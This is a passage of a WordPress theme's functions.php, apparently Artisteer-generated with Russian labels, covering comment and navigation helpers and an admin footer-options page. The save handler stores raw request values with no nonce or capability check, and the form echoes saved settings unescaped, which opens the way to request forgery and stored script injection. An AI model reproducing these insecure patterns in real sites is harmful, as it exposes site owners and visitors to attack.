    art_post_box($title, $content);
}

if (!function_exists('get_previous_comments_link')) {
	function get_previous_comments_link($label)
	{
		ob_start();
		previous_comments_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_next_comments_link')) {
	function get_next_comments_link($label)
	{
		ob_start();
		next_comments_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_previous_posts_link')) {
	function get_previous_posts_link($label)
	{
		ob_start();
		previous_posts_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_next_posts_link')) {
	function get_next_posts_link($label)
	{
		ob_start();
		next_posts_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_previous_post_link')) {
	function get_previous_post_link($label)
	{
		ob_start();
		previous_post_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_next_post_link')) {
	function get_next_post_link($label)
	{
		ob_start();
		next_post_link($label);
		return ob_get_clean();
	}
}

function art_get_comment_author_link(){
    ob_start();
    comment_author_link();    
    return ob_get_clean();
}

function art_get_edit_comment_link(){
    ob_start();
    edit_comment_link('('.__('Редактировать', THEME_NS).')','  ','');
    return  ob_get_clean();
}

function art_get_comment_text(){
    ob_start();
    comment_text();
    return  ob_get_clean();
}

function art_get_comment_reply_link($args, $depth){
    ob_start();
    comment_reply_link(array_merge( $args, array('depth' => $depth, 'max_depth' => $args['max_depth'])));
    return  ob_get_clean();
}


function art_comment($comment, $args, $depth)
{
	 $GLOBALS['comment'] = $comment; ?>
    <li <?php comment_class(); ?> id="li-comment-<?php comment_ID() ?>">
     <div id="comment-<?php comment_ID(); ?>">
<?php  art_post_box('',  art_parse_template("comment", array(
		'get_avatar'          =>   get_avatar($comment, $size='48'),
		'comment_author_link' =>   art_get_comment_author_link(),
		'status'              =>   $comment->comment_approved == '0' ?  '<em>' . __('Ваш комментарий ожидает модерации.', THEME_NS) . '</em><br />' : '',
		'get_comment_link'    =>   htmlspecialchars( get_comment_link( $comment->comment_ID ) ) ,
		'get_comment_date'    =>   sprintf(__('%1$s at %2$s', THEME_NS), get_comment_date(),  get_comment_time()),
		'edit_comment_link'   =>   art_get_edit_comment_link(),
		'comment_text'        =>   art_get_comment_text(),
		'comment_reply_link'  =>   art_get_comment_reply_link($args, $depth)))); ?>      
     </div>
<?php
}

add_filter('comments_template', 'legacy_comments');  
function legacy_comments($file) {  
    if(!function_exists('wp_list_comments')) : // WP 2.7-only check  
    $file = TEMPLATEPATH.'/legacy-comments.php';  
    endif;  
    return $file;  
} 

if ( function_exists('add_theme_support') ) {
	add_theme_support('post-thumbnails');
  add_theme_support('nav-menus');
  add_theme_support('automatic-feed-links');
}

if (function_exists('register_nav_menus')) {
    register_nav_menus(
		array(
			'primary-menu'   =>   __( 'Primary Menu', THEME_NS),
			'secondary-menu' =>   __( 'Secondary Menu', THEME_NS)
		)
	);
}
 

function art_add_admin() {
	global $options;
  if ( $_GET['page'] == basename(__FILE__) ) {
    if ('save' == $_REQUEST['action'] ) {
      foreach ($options as $value) {
          if($value['type'] != 'multicheck'){
            art_update_option( $value['id'], $_REQUEST[ $value['id'] ] );
          }else{
            foreach($value['options'] as $mc_key => $mc_value){
              $up_opt = $value['id'].'_'.$mc_key;
              art_update_option($up_opt, $_REQUEST[$up_opt] );
            }
          }
      }
      foreach ($options as $value) {
          if($value['type'] != 'multicheck'){
            if( isset( $_REQUEST[ $value['id'] ] ) ) { art_update_option( $value['id'], $_REQUEST[ $value['id'] ]  ); } else { delete_option( $value['id'] ); }
          }else{
            foreach($value['options'] as $mc_key => $mc_value){
              $up_opt = $value['id'].'_'.$mc_key;
              if( isset( $_REQUEST[ $up_opt ] ) ) { art_update_option( $up_opt, $_REQUEST[ $up_opt ]  ); } else { delete_option( $up_opt ); }
            }
          }
      }
      header("Location: themes.php?page=functions.php&saved=true");
      die;
    } 
  }
  add_theme_page("Footer", "Footer", 'edit_themes', basename(__FILE__), 'art_admin');
}
add_action('admin_menu', 'art_add_admin');

     
	
function art_update_option($key, $value){
	update_option($key, (get_magic_quotes_gpc()) ? stripslashes($value) : $value);
}


function art_admin() {
    global $options;
    if ( $_REQUEST['saved'] ) echo '<div id="message" class="updated fade"><p><strong>'.art_option('theme.name') . ' settings saved.</strong></p></div>';
?>
<div class="wrap">
	<h2>Footer</h2>

	<form method="post">

		<table class="optiontable" style="width:100%;">

<?php foreach ($options as $value) {
   
    switch ( $value['type'] ) {
        case 'text':
        option_wrapper_header($value);
        ?>
                <input style="width:100%;" name="<?php echo $value['id']; ?>" id="<?php echo $value['id']; ?>" type="<?php echo $value['type']; ?>" value="<?php if ( get_settings( $value['id'] ) != "") { echo get_settings( $value['id'] ); } else { echo $value['std']; } ?>" />
        <?php
        option_wrapper_footer($value);
        break;
       
        case 'select':
        option_wrapper_header($value);
        ?>
                <select style="width:70%;" name="<?php echo $value['id']; ?>" id="<?php echo $value['id']; ?>">
                    <?php foreach ($value['options'] as $option) { ?>
                    <option<?php if ( get_settings( $value['id'] ) == $option) { echo ' selected="selected"'; } elseif ($option == $value['std']) { echo ' selected="selected"'; } ?>><?php echo $option; ?></option>
                    <?php } ?>
                </select>
        <?php
        option_wrapper_footer($value);
        break;
       
        case 'textarea':
        $ta_options = $value['options'];
        option_wrapper_header($value);
        ?>
                <textarea name="<?php echo $value['id']; ?>" id="<?php echo $value['id']; ?>" style="width:100%;height:100px;"><?php
                if( get_settings($value['id']) !== false) {
                        echo stripslashes(get_settings($value['id']));
                    }else{
                        echo $value['std'];
                }?></textarea>
        <?php
        option_wrapper_footer($value);
        break;

        case "radio":
        option_wrapper_header($value);
       
        foreach ($value['options'] as $key=>$option) {
                $radio_setting = get_settings($value['id']);
                if($radio_setting != ''){
                    if ($key == get_settings($value['id']) ) {
                        $checked = "checked=\"checked\"";
                        } else {
                            $checked = "";
                        }
                }else{
                    if($key == $value['std']){
                        $checked = "checked=\"checked\"";
                    }else{
                        $checked = "";
                    }
                }?>
                <input type="radio" name="<?php echo $value['id']; ?>" value="<?php echo $key; ?>" <?php echo $checked; ?> /><?php echo $option; ?><br />
        <?php
        }
        
        option_wrapper_footer($value);
        break;
       
        case "checkbox":
        option_wrapper_header($value);
                        if(get_settings($value['id'])){
                            $checked = "checked=\"checked\"";
                        }else{
                            $checked = "";
                        }
                    ?>
                    <input type="checkbox" name="<?php echo $value['id']; ?>" id="<?php echo $value['id']; ?>" value="true" <?php echo $checked; ?> />
        <?php
        option_wrapper_footer($value);
        break;

        case "multicheck":
        option_wrapper_header($value);
       
        foreach ($value['options'] as $key=>$option) {
                 $pn_key = $value['id'] . '_' . $key;
                $checkbox_setting = get_settings($pn_key);
                if($checkbox_setting != ''){
                    if (get_settings($pn_key) ) {
                        $checked = "checked=\"checked\"";
                        } else {
                            $checked = "";
                        }
                }else{
                    if($key == $value['std']){
                        $checked = "checked=\"checked\"";
                    }else{
                        $checked = "";
                    }
                }?>
                <input type="checkbox" name="<?php echo $pn_key; ?>" id="<?php echo $pn_key; ?>" value="true" <?php echo $checked; ?> /><label for="<?php echo $pn_key; ?>"><?php echo $option; ?></label><br />
        <?php
        }
        
        option_wrapper_footer($value);
        break;
       
        case "heading":
        ?>
        <tr valign="top">
            <td colspan="2" style="text-align: center;"><h3><?php echo $value['name']; ?></h3></td>
        </tr>
        <?php
        break;
       
        default:

        break;
    }
}
?>

		</table>

		<p class="submit">
			<input name="save" type="submit" value="Сохранить" />
			<input type="hidden" name="action" value="save" />
		</p>
	</form>
</div>
<?php
}

function option_wrapper_header($values){
    ?>
    <tr valign="top">
        <th scope="row" style="width:1%;white-space: nowrap;"><?php echo $values['name']; ?>:</th>
        <td>
    <?php
}

function option_wrapper_footer($values){
    ?>
        </td>
    </tr>
    <tr valign="top">
        <td>&nbsp;</td><td><small><?php echo $values['desc']; ?></small></td>
    </tr>
    <?php
}
